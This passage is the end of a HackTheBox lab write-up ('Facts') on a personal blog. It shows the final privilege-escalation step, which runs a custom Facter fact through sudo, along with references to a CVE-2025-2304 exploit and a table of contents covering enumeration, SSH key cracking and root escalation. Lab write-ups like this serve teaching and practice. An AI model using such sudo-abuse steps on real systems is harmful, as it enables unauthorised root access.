</span></span></code></pre></div><p>Then execute it by running:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>sudo facter --custom-dir . read_flag
</span></span></code></pre></div><figure><img src=/img/facts/Pasted%20image%2020260207203330.webp></figure><hr><h3 id=references><a href=#references class=anchor-head aria-label=Anchor></a>References</h3><ul><li><a href=https://github.com/Alien0ne/CVE-2025-2304>CVE-2025-2304 Exploit</a></li><li><a href=https://knowledge-base.secureflag.com/vulnerabilities/inadequate_input_validation/mass_assignment_ruby.html>Mass Assignments in Ruby</a></li><li><a href=https://github.com/owen2345/camaleon-cms/pull/1109>CVE-2025-2304 Fix</a></li><li><a href=https://help.puppet.com/core/current/Content/PuppetCore/facter.htm>Facter docs</a></li></ul></div></article></main><aside id=sticky-top><div class=toc-title><p>Facts | HackTheBox</p><hr id=toc-hr></div><nav id=toc class=toc-container><nav id=TableOfContents><ul><li><ul><li><a href=#overview>Overview</a></li></ul></li><li><a href=#information-gathering>Information Gathering</a></li><li><a href=#enumeration>Enumeration</a><ul><li><a href=#port-80---http-nginx>Port 80 - HTTP (Nginx)</a></li><li><a href=#admin-privilege-escalation>Admin Privilege Escalation</a></li><li><a href=#s3-bucket>S3 bucket</a></li></ul></li><li><a href=#exploitation>Exploitation</a><ul><li><a href=#cracking-ssh-key-passphrase>Cracking SSH key passphrase</a></li><li><a href=#initial-access-unintended-method>Initial Access (Unintended method)</a></li></ul></li><li><a href=#privilege-escalation>Privilege Escalation</a><ul><li><a href=#local-enumeration>Local Enumeration</a></li><li><a href=#privilege-escalation-1>Privilege Escalation</a></li><li><a href=#references>References</a></li></ul></li></ul></nav></nav></aside><small class=post-updated-at>updated at 2026-06-07</small><hr><div class=series-nav><div class="alert alert-note"><div class=alert-heading-box><a href=https://h4r1337.github.io/series/hack-the-box/><p class=alert-heading>Hack the Box Series</p></a></div></div><nav class=post-nav style=margin-top:1rem;border-top:none><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/jeeves/><div class=nav-arrow>Previous in series</div><span class=post-title>Jeeves | HackTheBox</span>
</a><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/trick/><div class=nav-arrow>Next in series</div><span class=post-title>Trick | HackTheBox</span></a></nav></div><nav class=post-nav><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/jeeves/><div class=nav-arrow>Previous</div><span class=post-title>Jeeves | HackTheBox</span>
</a><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/trick/><div class=nav-arrow>Next</div><span class=post-title>Trick | HackTheBox</span></a></nav></div><footer class=footer><a class=footer_item href=javascript::void(0)>resume</a>
<a class=footer_item href=/index.xml>rss</a>
<span class=footer_item>&copy; 2026</span>
<small class=footer_copyright><a href=https://github.com/h4r1337/hugo-klise target=_blank rel="noreferrer noopener">hugo-klisé</a>
theme on
<a href=https://gohugo.io target=_blank rel="noreferrer noopener">Hugo</a><br><span>Made by <a href=https://github.com/h4r1337 target=_blank rel="noreferrer noopener">h4r1337</a></span></small></footer><script src=/js/main.js defer></script><script src=/js/toc.js defer></script></body></html>